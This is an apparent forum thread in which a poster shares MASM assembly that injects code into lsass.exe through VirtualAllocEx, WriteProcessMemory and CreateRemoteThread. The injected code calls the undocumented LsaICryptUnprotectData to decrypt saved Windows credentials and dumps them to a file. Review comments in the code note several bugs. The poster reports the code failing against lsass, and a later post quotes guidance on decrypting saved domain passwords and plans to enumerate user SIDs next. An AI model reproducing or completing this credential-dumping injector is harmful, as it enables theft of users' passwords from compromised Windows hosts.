May 12th, 2011, 09:04 PM
Injecting Into Lsass for Encrypted Data
Code:
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\lsasrv.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\lsasrv.lib
.const
; Selector values for FindProcessByName's _returntype argument:
; PROCESS_HANDLE -> return an OpenProcess() handle, PROCESS_ID -> return the raw PID.
PROCESS_HANDLE equ 0
PROCESS_ID equ 1
.data
szProcess db 'lsass.exe',0                 ; name of the target process looked up from start:
szKernel db 'KERNEL32',0                   ; module / export used to resolve GetProcAddress in THIS process
szGetProcAddress db 'GetProcAddress',0
.data?
hProcess dd ?                              ; handle to the target process (unchecked result of FindProcessByName)
lpInjected dd ?                            ; remote address returned by VirtualAllocEx
lenInjected dd ?                           ; size of the blob: EndInjected - Injected
pInfo PROCESS_INFORMATION <>               ; declared but not referenced anywhere in the visible code
sInfo STARTUPINFO <>                       ; declared but not referenced anywhere in the visible code
; Prototype so that `invoke Injected, ...` (the commented-out local test path in start:) assembles.
Injected PROTO:DWORD
.code
;-----------------------------------------------------------------------
; Injected(lpGetProcAddress)
;   Thread body that is copied byte-for-byte into the target process
;   (start: copies [Injected, EndInjected) with WriteProcessMemory and
;   runs it via CreateRemoteThread). It must therefore be position
;   independent: every string it needs is emitted inline and fetched
;   with the `call label / db ... / label: pop ecx` trick, and no .data
;   symbol is referenced.
;   In : lpGetProcAddress = address of kernel32!GetProcAddress as seen by
;        the injecting process (start: passes it as the thread parameter;
;        this only works if kernel32 is mapped at the same base in the
;        target — presumably true, but not checked anywhere).
;   Out: never returns normally — ends with ExitThread(0).
;   Stack[] is used as a small table of resolved pointers:
;     Stack+0  GetProcAddress        Stack+16 LsaICryptUnprotectData
;     Stack+4  kernel32 base         Stack+20 CreateFileA
;     Stack+8  LoadLibraryA          Stack+24 WriteFile
;     Stack+12 lsasrv.dll handle     Stack+28 ExitThread
;   NOTE(review): Buffer is 100h bytes, but both the decrypt call and the
;   WriteFile below use 0FFFFh as the size — WriteFile will read far past
;   the local, and if the callee writes up to 0FFFFh bytes it overruns
;   the stack frame. The sizes should agree.
;   NOTE(review): no return value (GetProcAddress, LoadLibrary, CreateFileA,
;   WriteFile) is checked; a NULL pointer is called blindly.
;-----------------------------------------------------------------------
Injected PROC lpGetProcAddress:DWORD
LOCAL Stack[20h]:dword                     ; pointer table, see header
LOCAL entropy[16]:byte                     ; passed to the decrypt call; never initialised here
LOCAL Buffer[100h]:byte                    ; output buffer; never initialised here
LOCAL cbSize:dword                         ; receives an output size from the decrypt call
LOCAL BytesReturned:dword
ASSUME fs:NOTHING
; --- locate kernel32 by walking the PEB loader list (no imports needed) ---
; ebp is borrowed as scratch during the walk and restored before any LOCAL is touched.
push ebp
xor eax,eax
mov esi,fs:[eax+30h]                       ; fs:[30h] = PEB
mov esi,[esi+0Ch]                          ; PEB.Ldr
mov esi,[esi+1Ch]                          ; Ldr.InInitializationOrderModuleList.Flink
next_module:
mov ebp,[esi+08h]                          ; DllBase of this entry
mov edi,[esi+20h]                          ; BaseDllName.Buffer (UTF-16)
mov esi,[esi]                              ; advance to next entry
cmp [edi+12*2],al                          ; heuristic: name must be exactly 12 wide chars ("kernel32.dll")
jne next_module
cmp byte ptr[edi],6Bh                      ; ... and start with 'k'
je find_kernel32_finished
cmp byte ptr[edi],4Bh                      ; ... or 'K' (no full string compare is done)
je find_kernel32_finished
jmp next_module
find_kernel32_finished:
mov ecx,ebp                                ; ecx = kernel32 base
pop ebp                                    ; restore frame pointer before using LOCALs
mov eax,lpGetProcAddress
mov Stack,eax                              ; Stack+0  = GetProcAddress
mov Stack+4,ecx                            ; Stack+4  = kernel32 base
; Each `call loc_N` pushes the address of the inline string that follows it;
; `pop ecx` at loc_N then yields a position-independent pointer to that string.
call loc_1
_szLoadLibraryA db "LoadLibraryA",0
loc_1:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+8,eax                            ; Stack+8  = LoadLibraryA
call loc_2
_szlsasrv db "lsasrv.dll",0
loc_2:
pop ecx
invoke (type LoadLibrary)ptr Stack+8,ecx
mov Stack+12,eax                           ; Stack+12 = lsasrv.dll module handle
call loc_3
_szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
loc_3:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+12,ecx
mov Stack+16,eax                           ; Stack+16 = LsaICryptUnprotectData
; The prototype comes from lsasrv.inc (not visible here); the meaning of the
; fixed arguments (0FFFFh, 20000041h, the zeros) is not documented on this page.
invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize
call loc_4
_szCreateFileA db "CreateFileA",0
loc_4:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+20,eax                           ; Stack+20 = CreateFileA
call loc_5
_szWriteFile db "WriteFile",0
loc_5:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+24,eax                           ; Stack+24 = WriteFile
call loc_6
_szExitThread db "ExitThread",0
loc_6:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+28,eax                           ; Stack+28 = ExitThread
call loc_7
FileName db "c:\Dump.txt", 0
loc_7:
pop ecx                                    ; ecx = "c:\Dump.txt"
;BreakpointHere db 0cch
; CreateFileA(name, GENERIC_WRITE, share=7 (read|write|delete), NULL, CREATE_ALWAYS, NORMAL, NULL)
invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
mov ecx, eax                               ; handle (INVALID_HANDLE_VALUE is not checked)
; Writes 0FFFFh bytes from a 100h-byte local — see NOTE(review) in the header.
invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0
invoke (type ExitThread)ptr Stack+28, 0    ; ends the remote thread; the file handle is never closed
ret                                        ; unreachable after ExitThread
Injected endp
EndInjected:                               ; end marker: start: copies [Injected, EndInjected)
;-----------------------------------------------------------------------
; FindProcessByName(_exename, _returntype)
;   Walks a Toolhelp process snapshot and returns the first process whose
;   image name matches _exename (case-insensitive via lstrcmpi).
;   In : _exename    = ANSI image name, e.g. "lsass.exe"
;        _returntype = PROCESS_ID     -> eax = PID (0 when not found)
;                      PROCESS_HANDLE -> eax = OpenProcess(PROCESS_ALL_ACCESS)
;                                        on that PID (NULL on failure;
;                                        a not-found PID of 0 is still
;                                        passed to OpenProcess)
;   Clobbers: eax, flags. ebx/ecx/edx/esi/edi are preserved via `uses`.
;   The snapshot handle is always closed before returning.
;-----------------------------------------------------------------------
FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
    LOCAL pe    :PROCESSENTRY32
    LOCAL hSnap :dword

    mov     pe.dwSize, sizeof PROCESSENTRY32
    invoke  CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
    mov     hSnap, eax

    ; eax holds the Process32First/Next result while iterating;
    ; on a match it is replaced by the PID and the loop is left.
    invoke  Process32First, hSnap, addr pe
    .while eax != FALSE
        lea     edx, pe.szExeFile
        invoke  lstrcmpi, edx, _exename
        .if eax == 0
            mov     eax, pe.th32ProcessID       ; found: eax = PID
            .break
        .endif
        invoke  Process32Next, hSnap, addr pe
    .endw

    ; Keep the result (PID, or 0 when the walk ended) across CloseHandle.
    mov     ebx, eax
    invoke  CloseHandle, hSnap
    mov     eax, ebx

    .if _returntype == PROCESS_HANDLE
        invoke  OpenProcess, PROCESS_ALL_ACCESS, FALSE, eax   ; eax = hProcess (or NULL)
    .endif
    ret
FindProcessByName endp
;-----------------------------------------------------------------------
; start: program entry point.
;   1. computes the size of the Injected blob as EndInjected - Injected,
;   2. resolves a PROCESS_ALL_ACCESS handle to szProcess ("lsass.exe"),
;   3. allocates RWX memory there, copies the blob in,
;   4. starts a remote thread at the copy with this process's address of
;      kernel32!GetProcAddress as the thread parameter.
;   NOTE(review): none of hProcess, lpInjected, WriteProcessMemory or
;   CreateRemoteThread results are checked; a NULL handle from
;   FindProcessByName (process not found / access denied) flows straight
;   into VirtualAllocEx.
;   NOTE(review): passing a local GetProcAddress address into another
;   process assumes kernel32 shares a base in both — presumably the case
;   on this author's system, but nothing here verifies it.
;   NOTE(review): open-lsass-with-full-access + RWX VirtualAllocEx +
;   CreateRemoteThread is exactly the sequence host security telemetry
;   is usually tuned to flag; treat that as a property of this code.
;-----------------------------------------------------------------------
start:
; Commented-out local test path: runs Injected in this process instead of lsass.
;invoke GetModuleHandle,addr szKernel
;invoke GetProcAddress,eax,addr szGetProcAddress
;invoke Injected, EAX
;invoke ExitProcess,0
mov ebx,EndInjected
sub ebx,Injected
mov lenInjected,ebx                        ; size of the relocatable blob
invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE
mov hProcess, eax                          ; unchecked: may be NULL
invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
mov lpInjected,eax                         ; unchecked: may be NULL
invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0
invoke GetModuleHandle,addr szKernel
invoke GetProcAddress,eax,addr szGetProcAddress
; Thread start = remote copy of Injected, parameter = local GetProcAddress address.
invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0
invoke ExitProcess,0                       ; hProcess is never closed explicitly
end start
I wrote a lot of this code from scratch and the rest from snippets.
Everything here seems to work fine with calc.exe — but of course that process does not have access to the encrypted data — and when I run it targeting lsass.exe it does not execute correctly. Does anyone have an idea of how this is done correctly?
EDIT:
I am guessing this is the issue =(
http://mnin.blogspot.com/2007/05/inj...ged-win32.html
Last edited by AgentSmithers; May 13th, 2011 at 01:09 AM.
May 17th, 2011, 01:48 PM
Re: Injecting Into Lsass for Encrypted Data
Okay, I'm getting really warm, I guess. Now I need to enumerate the SIDs of the users I want to extract and then call the decrypt API.
As quoted:
I guess I ought to answer this question myself since I've now spent ages working out how to do this and I'm not sure it's widely known. CredEnumerate/CredRead will never provide password information for domain passwords no matter what process context you're in or what token you have, despite what it seems to hint at on MSDN. The only way to get access to the saved credential information is to do so using the undocumented function LSAICryptUnprotectData() which is in lsasrv.dll. This can decrypt the files you find in %APPDATA%\Microsoft\Credentials and can provide an identical data structure to CredEnumerate except with the password filled in. The only catch is that this must be done in the process context of lsass.exe (the Windows security subsystem); no setting of privileges etc. is enough to give a normal process the rights to do this. If you're a hacker you can do this by performing a CreateRemoteThread() to inject a thread into lsass.exe, or if you're trying to do this in a legitimate way, i.e. you're extending the Windows operating system in some way for a third-party application, like I was, you can do this by creating a Windows authentication package which lsass will load. This AP can then use a named pipe or some such method to allow interaction with the rest of your code.
I'm getting warm; it looks like my code is half done. I need to extract the SIDs and then target the encrypted file.